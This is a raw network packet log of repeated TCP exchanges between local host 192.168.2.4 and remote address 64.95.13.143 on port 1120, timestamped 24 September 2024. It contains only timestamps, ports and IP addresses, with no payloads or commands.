Sep 24, 2024 17:46:12.596651077 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.596658945 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.596669912 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.596685886 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.596690893 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.596705914 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.596718073 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.596728086 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.596754074 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.597296000 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.597310066 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.597323895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.597337961 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.597349882 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.597362995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.597373962 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.597383022 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.597395897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.597419977 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.597592115 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.597604990 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.597618103 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.597626925 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.597651005 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.597659111 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.597670078 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.597682953 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.597700119 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.597707987 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.597735882 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.598467112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.598547935 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.598561049 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.598588943 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.598786116 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.598798037 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.598826885 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.598917961 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.598931074 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.598957062 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.599185944 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.599196911 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.599227905 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.654412985 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.657253981 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.657269001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.657283068 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.657336950 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.657416105 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.657428980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.657444000 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.657453060 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.657464027 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.657485962 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.657613039 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.657651901 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.680530071 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.680546999 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.680561066 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.680584908 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.680598974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.680610895 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.680624008 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.680638075 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.680665016 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.686045885 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686059952 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686072111 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686098099 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.686121941 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.686145067 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686158895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686172009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686186075 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686204910 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.686237097 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.686467886 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686480045 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686496019 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686510086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686517000 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686533928 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.686542988 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.686552048 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686567068 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686579943 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686589956 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.686608076 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.686619997 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686939955 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686953068 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686970949 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.686980963 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.686991930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687006950 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687017918 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.687047958 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.687210083 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687222004 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687236071 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687247992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687262058 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687271118 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.687283039 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687294960 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.687303066 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687311888 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.687324047 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687336922 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687350035 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687360048 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.687376976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687391996 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.687652111 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687664032 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687707901 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.687727928 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687741041 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687752008 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687760115 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.687769890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687788010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.687794924 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.687820911 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.688112974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688126087 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688139915 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688153982 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688163996 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.688175917 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688188076 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688199043 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.688215017 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688225985 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.688235044 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688246965 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688261032 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688270092 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.688282013 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688294888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688311100 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.688324928 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688332081 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.688342094 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688354015 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688366890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688376904 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.688390970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688400984 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.688410997 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688426018 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688438892 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.688447952 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.688472033 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.689007044 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689019918 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689033031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689045906 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689059019 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.689068079 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689085960 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689094067 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.689104080 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689119101 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689126015 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.689135075 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689156055 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689162016 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.689172983 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689183950 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.689193010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689208984 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689225912 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689232111 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.689243078 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689263105 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.689467907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689480066 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689491987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689546108 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.689546108 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.689587116 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689604044 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689615965 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689630985 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689640999 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.689652920 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689662933 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.689673901 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689686060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689697981 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689707994 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.689718962 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689733982 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.689743996 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.689779043 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.690169096 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.690181017 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.690196037 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.690208912 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.690217972 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.690232038 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.690252066 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.690318108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.690330982 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.690346956 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.690357924 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.690386057 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.691514969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.691526890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.691540003 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.691574097 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.691838980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.691852093 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.691871881 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.691881895 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.691912889 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.692044973 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.692059040 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.692097902 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.749761105 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.749788046 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.749798059 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.749842882 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.749876022 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.749888897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.749902010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.749912024 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.749923944 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.749946117 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.750233889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.750276089 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.773350954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.773364067 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.773375988 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.773483038 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.773643017 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.773655891 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.773668051 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.773684978 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.773691893 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.773725033 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.778501987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.778539896 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.778549910 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.778562069 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.778605938 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.778764009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.778775930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.778788090 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.778801918 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.778815031 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.778835058 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.779170990 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779192924 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779205084 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779216051 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779228926 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779247999 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.779256105 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.779268980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779279947 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779292107 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779300928 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.779313087 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779330969 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.779453039 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779464960 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779476881 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779489994 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.779498100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779505968 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.779516935 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779527903 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779541969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779551029 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.779561996 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779576063 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.779582977 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779594898 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.779613972 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.780107021 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780118942 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780132055 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780143976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780153036 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.780164957 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780173063 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.780184031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780199051 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780205011 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.780215025 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780227900 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780235052 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.780244112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780256987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780265093 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.780275106 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780292988 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.780298948 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780328989 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.780436039 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780447960 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780466080 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780478954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780489922 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.780522108 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.780584097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780597925 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780610085 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780622005 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780631065 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.780658007 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.780872107 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780883074 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780894995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780908108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780916929 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.780927896 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780940056 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780950069 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.780961037 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780972958 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.780982971 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.780992985 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781012058 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.781546116 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781560898 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781574011 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781584024 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.781594992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781605959 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781615019 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.781625032 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781640053 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.781645060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781657934 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781672001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781687021 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.781697989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781709909 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781718016 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.781728029 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781740904 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781748056 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.781758070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781769037 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.781778097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781810045 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.781979084 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.781990051 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.782001972 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.782027960 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.782054901 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.782067060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.782078981 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.782087088 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.782098055 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.782115936 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.782831907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.782845020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.782857895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.782870054 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.782957077 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.782967091 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.782974958 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.782985926 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.782996893 CEST11204973064.95.13.143192.168.2.4
